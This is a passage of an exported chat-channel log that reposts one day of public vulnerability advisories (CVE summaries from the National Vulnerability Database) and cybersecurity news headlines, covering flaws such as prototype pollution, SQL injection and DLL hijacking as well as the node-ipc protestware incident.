<strong>‼ CVE-2022-25296 ‼</strong><br><br><code>The package bodymen from 0.0.0 are vulnerable to Prototype Pollution via the handler function which could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload. **Note:** This vulnerability derives from an incomplete fix to [CVE-2019-10792](https://security.snyk.io/vuln/SNYK-JS-BODYMEN-548897)</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25296">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39139">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:41">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-45793 ‼</strong><br><br><code>Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45793">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39140">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:42">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-0748 ‼</strong><br><br><code>The package post-loader from 0.0.0 are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0748">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39141">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:43">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-44259 ‼</strong><br><br><code>A vulnerability is in the &apos;wx.html&apos; page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When an unauthorized user accesses this page directly, it connects to this device as a friend of the device owner.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44259">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39142">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:44">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-25354 ‼</strong><br><br><code>The package set-in before 2.0.3 are vulnerable to Prototype Pollution via the setIn method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049)</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25354">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39143">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:45">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-45794 ‼</strong><br><br><code>Slims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45794">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39144">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:21:46">
11:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-23556 ‼</strong><br><br><code>The package guake before 3.8.5 are vulnerable to Exposed Dangerous Method or Function due to the exposure of execute_command and execute_command_by_uuid methods via the d-bus interface, which makes it possible for a malicious user to run an arbitrary command via the d-bus method. **Note:** Exploitation requires the user to have installed another malicious program that will be able to send dbus signals or run terminal commands.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23556">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39145">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:27:32">
11:27
       </div>

       <div class="text">
<strong>‼ CVE-2022-0749 ‼</strong><br><br><code>This affects all versions of package SinGooCMS.Utility. The socket client in the package can pass in the payload via the user-controllable input after it has been established, because this socket client transmission does not have the appropriate restrictions or type bindings for the BinaryFormatter.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0749">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39146">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:27:33">
11:27
       </div>

       <div class="text">
<strong>‼ CVE-2021-23771 ‼</strong><br><br><code>This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object&apos;s prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878).</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23771">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39147">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:27:34">
11:27
       </div>

       <div class="text">
<strong>❌ Reporting Mandates to Clear Up Feds’ Hazy Look into Threat Landscape – Podcast ❌</strong><br><br><code>It’s about time, AttackIQ’s Jonathan Reiber said about 24H/72H report deadlines mandated in the new spending bill. As it is, visibility into adversary behavior has been muck.</code><br><br><a href="https://threatpost.com/reporting-mandates-to-clear-up-feds-hazy-look-into-threat-landscape-podcast/178947/">📖 Read</a><br><br>via &quot;<em>Threat Post</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39148">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 11:57:26">
11:57
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>❌ Misconfigured Firebase Databases Exposing Data in Mobile Apps ❌</strong><br><br><code>Five percent of the databases are vulnerable to threat actors: It&apos;s a gold mine of exploit opportunity in thousands of mobile apps, researchers say.</code><br><br><a href="https://threatpost.com/misconfigured-firebase-databases-exposing-data-mobile-apps/178965/">📖 Read</a><br><br>via &quot;<em>Threat Post</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39149">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 12:09:25">
12:09
       </div>

       <div class="text">
<strong>🗓️ Downdetector: How the popular site outage tracker is helping to improve web security 🗓️</strong><br><br><code>‘Minutes matter, and being able to get that additional feed can give infosec teams the edge’</code><br><br><a href="https://portswigger.net/daily-swig/downdetector-how-the-popular-site-outage-tracker-is-helping-to-improve-web-security">📖 Read</a><br><br>via &quot;<em>The Daily Swig</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39150">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 14:02:19">
14:02
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 Stopping Russian Cyberattacks at Their Source 🕴</strong><br><br><code>Step up training with cybersecurity drills, teach how to avoid social engineering traps, share open source monitoring tools, and make multifactor authentication the default.</code><br><br><a href="https://www.darkreading.com/attacks-breaches/stopping-russian-cyberattacks-at-their-source">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39151">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 15:26:39">
15:26
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2021-44906 ‼</strong><br><br><code>Minimist &lt;=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44906">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39152">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 15:26:40">
15:26
       </div>

       <div class="text">
<strong>‼ CVE-2022-25364 ‼</strong><br><br><code>In Gradle Enterprise before 2021.4.2, the default built-in build cache configuration allowed anonymous write access. If this was not manually changed, a malicious actor with network access to the build cache could potentially populate it with manipulated entries that execute malicious code as part of a build. As of 2021.4.2, the built-in build cache is inaccessible-by-default, requiring explicit configuration of its access-control settings before it can be used. (Remote build cache nodes are unaffected as they are inaccessible-by-default.)</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25364">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39153">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 15:26:40">
15:26
       </div>

       <div class="text">
<strong>‼ CVE-2022-26503 ‼</strong><br><br><code>Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26503">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39154">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 15:26:41">
15:26
       </div>

       <div class="text">
<strong>‼ CVE-2022-24759 ‼</strong><br><br><code>`@chainsafe/libp2p-noise` contains TypeScript implementation of noise protocol, an encryption protocol used in libp2p. `@chainsafe/libp2p-noise` before 4.1.2 and 5.0.3 does not correctly validate signatures during the handshake process. This may allow a man-in-the-middle to pose as other peers and get those peers banned. Users should upgrade to version 4.1.2 or 5.0.3 to receive a patch. There are currently no known workarounds.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24759">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39155">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 15:26:43">
15:26
       </div>

       <div class="text">
<strong>‼ CVE-2020-15591 ‼</strong><br><br><code>fexsrv in F*EX (aka Frams&apos; Fast File EXchange) before fex-20160919_2 allows eval injection (for unauthenticated remote code execution).</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-15591">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39156">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 15:26:44">
15:26
       </div>

       <div class="text">
<strong>‼ CVE-2022-26526 ‼</strong><br><br><code>Anaconda Anaconda3 through 2021.11.0.0 and Miniconda3 through 11.0.0.0 can create a world-writable directory under %PROGRAMDATA% and place that directory into the system PATH environment variable. Thus, for example, local users can gain privileges by placing a Trojan horse file into that directory. (This problem can only happen in a non-default installation. The person who installs the product must specify that it is being installed for all users. Also, the person who installs the product must specify that the system PATH should be changed.)</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26526">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39157">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 15:36:16">
15:36
       </div>

       <div class="text">
<strong>🔏 Configuration Essential to MFA Enforcement 🔏</strong><br><br><code>Organizations should enforce MFA for all users but avoid default MFA protocols that can be abused to steal sensitive data.</code><br><br><a href="https://digitalguardian.com/blog/configuration-essential-mfa-enforcement">📖 Read</a><br><br>via &quot;&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39158">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 16:27:32">
16:27
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>❌ Dev Sabotages Popular NPM Package to Protest Russian Invasion ❌</strong><br><br><code>In the latest software supply-chain attack, the code maintainer added malicious code to the hugely popular node-ipc library to replace files with a heart emoji and a peacenotwar module.</code><br><br><a href="https://threatpost.com/dev-sabotages-popular-npm-package-protest-russian-invasion/178972/">📖 Read</a><br><br>via &quot;<em>Threat Post</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39159">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 16:32:32">
16:32
       </div>

       <div class="text">
<strong>🕴 Titaniam Announces Completion of Product Suite 🕴</strong><br><br><code>The Titaniam Suite includes ransomware and extortion defense capabilities in the form of five products.</code><br><br><a href="https://www.darkreading.com/vulnerabilities-threats/titaniam-announces-completion-of-product-suite">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39160">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 16:32:34">
16:32
       </div>

       <div class="text">
<strong>🕴 Cloudflare Announces API Gateway 🕴</strong><br><br><code>Organizations can secure, manage, and monitor all of their APIs in one easy-to-use dashboard.</code><br><br><a href="https://www.darkreading.com/cloud/cloudflare-announces-api-gateway">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39161">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 16:32:35">
16:32
       </div>

       <div class="text">
<strong>🕴 Glasswall Launches Freemium Version of its Desktop Content Disarm and Reconstruction App 🕴</strong><br><br><code>Glasswall technology offers proactive protection from file-based cybersecurity threats.</code><br><br><a href="https://www.darkreading.com/vulnerabilities-threats/glasswall-launches-freemium-version-of-its-desktop-content-disarm-and-reconstruction-app">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39162">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 17:02:33">
17:02
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 Nok Nok Labs Unveils S3 Authentication Suite 🕴</strong><br><br><code>Enhancements include support for OpenID Connect as an integration mechanism.</code><br><br><a href="https://www.darkreading.com/remote-workforce/nok-nok-labs-unveils-s3-authentication-suite">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39163">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 17:02:33">
17:02
       </div>

       <div class="text">
<strong>🕴 Firefly Announces Release of ValidIaC Open Source Solution 🕴</strong><br><br><br><br><a href="https://www.darkreading.com/application-security/firefly-announces-thefirefly-announces-release-of-validiac-open-source-solution">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39164">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 17:26:44">
17:26
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-26511 ‼</strong><br><br><code>WPS Presentation 11.8.0.5745 insecurely load d3dx9_41.dll when opening .pps files(&apos;current directory type&apos; DLL loading).</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26511">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39165">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 17:26:45">
17:26
       </div>

       <div class="text">
<strong>‼ CVE-2022-26081 ‼</strong><br><br><code>The installer of WPS Office Version 10.8.0.5745 insecurely load shcore.dll, allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26081">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39166">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 17:26:45">
17:26
       </div>

       <div class="text">
<strong>‼ CVE-2022-25949 ‼</strong><br><br><code>The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25949">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39167">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 17:26:47">
17:26
       </div>

       <div class="text">
<strong>‼ CVE-2022-25969 ‼</strong><br><br><code>The installer of WPS Office Version 10.8.0.6186 insecurely load VERSION.DLL (or some other DLLs), allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25969">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39168">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 19:21:48">
19:21
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 ThreatMapper Updated With New Scanning Tools 🕴</strong><br><br><code>ThreatMapper 1.3.0 features secret scanning and the ability to enumerate a software bill of materials (SBOM) at runtime to help secure serverless, Kubernetes, container and multi-cloud environments.</code><br><br><a href="https://www.darkreading.com/dr-tech/threatmapper-updated-with-new-scanning-tools">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39169">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 19:21:49">
19:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-44907 ‼</strong><br><br><code>A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of property in the gs.parse function. The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44907">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39170">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 19:21:50">
19:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-26500 ‼</strong><br><br><code>Improper limitation of path names in Veeam Backup &amp; Replication 9.5U3, 9.5U4,10.x, and 11.x allows remote authenticated users access to internal API functions that allows attackers to upload and execute arbitrary code.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26500">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39171">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 19:21:51">
19:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-26504 ‼</strong><br><br><code>Improper authentication in Veeam Backup &amp; Replication 9.5U3, 9.5U4,10.x and 11.x component used for Microsoft System Center Virtual Machine Manager (SCVMM) allows attackers execute arbitrary code via Veeam.Backup.PSManager.exe</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26504">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39172">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 19:21:52">
19:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-26501 ‼</strong><br><br><code>Veeam Backup &amp; Replication 10.x and 11.x has Incorrect Access Control (issue 1 of 2).</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26501">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39173">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 19:26:47">
19:26
       </div>

       <div class="text">
<strong>‼ CVE-2021-46107 ‼</strong><br><br><code>Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-46107">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39174">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 19:26:48">
19:26
       </div>

       <div class="text">
<strong>‼ CVE-2021-45040 ‼</strong><br><br><code>The Spatie media-library-pro library through 1.17.10 and 2.x through 2.1.6 for Laravel allows remote attackers to upload executable files via the uploads route.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45040">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39175">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 19:26:49">
19:26
       </div>

       <div class="text">
<strong>‼ CVE-2022-21822 ‼</strong><br><br><code>NVIDIA FLARE contains a vulnerability in the admin interface, where an un-authorized attacker can cause Allocation of Resources Without Limits or Throttling, which may lead to cause system unavailable.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21822">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39176">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 19:26:50">
19:26
       </div>

       <div class="text">
<strong>‼ CVE-2022-24770 ‼</strong><br><br><code>`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer&apos;s computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user&apos;s computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24770">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39177">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 19:48:09">
19:48
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>♟️ Pro-Ukraine ‘Protestware’ Pushes Antiwar Ads, Geo-Targeted Malware ♟️</strong><br><br><code>Researchers are tracking a number of open-source &quot;protestware&quot; projects on GitHub that have recently altered their code to display &quot;Stand with Ukraine&quot; messages for users, or basic facts about the carnage in Ukraine. The group also is tracking several code packages that were recently modified to erase files on computers that appear to be coming from Russian or Belarusian Internet addresses.</code><br><br><a href="https://krebsonsecurity.com/2022/03/pro-ukraine-protestware-pushes-antiwar-ads-geo-targeted-malware/">📖 Read</a><br><br>via &quot;<em>Krebs on Security</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39178">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 20:02:42">
20:02
       </div>

       <div class="text">
<strong>🕴 6 Reasons Not to Pay Ransomware Attackers 🕴</strong><br><br><code>Paying a ransom might appear to be the best option, but it comes with its own costs.</code><br><br><a href="https://www.darkreading.com/attacks-breaches/-6-reasons-not-to-pay-ransomware-attackers">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39179">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 21:21:53">
21:21
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-24302 ‼</strong><br><br><code>In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24302">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39180">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 21:21:54">
21:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-0758 ‼</strong><br><br><code>Rapid7 Nexpose versions 6.6.129 and earlier suffer from a reflected cross site scripting vulnerability, within the shared scan configuration component of the tool. With this vulnerability an attacker could pass literal values as the test credentials, providing the opportunity for a potential XSS attack. This issue is fixed in Rapid7 Nexpose version 6.6.130.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0758">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39181">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 21:21:55">
21:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-44088 ‼</strong><br><br><code>An SQL Injection vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows a remote attacker to bypass authentication via unsanitized login parameters.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44088">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39182">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 21:21:56">
21:21
       </div>

       <div class="text">
<strong>‼ CVE-2021-44087 ‼</strong><br><br><code>A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows an unauthenticated remote attacker to upload a maliciously crafted PHP via photo upload.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44087">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39183">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 21:21:57">
21:21
       </div>

       <div class="text">
<strong>‼ CVE-2022-0237 ‼</strong><br><br><code>Rapid7 Insight Agent versions 3.1.2.38 and earlier suffer from a privilege escalation vulnerability, whereby an attacker can hijack the flow of execution due to an unquoted argument to the runas.exe command used by the ir_agent.exe component, resulting in elevated rights and persistent access to the machine. This issue was fixed in Rapid7 Insight Agent version 3.1.3.80.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0237">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39184">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 21:22:01">
21:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-0757 ‼</strong><br><br><code>Rapid7 Nexpose versions 6.6.93 and earlier are susceptible to an SQL Injection vulnerability, whereby valid search operators are not defined. This lack of validation can allow an attacker to manipulate the &quot;ANY&quot; and &quot;OR&quot; operators in the SearchCriteria and inject SQL code. This issue was fixed in Rapid7 Nexpose version 6.6.129.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0757">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39185">

      <div class="body">

       <div class="pull_right date details" title="17.03.2022 21:22:02">
21:22
       </div>

       <div class="text">
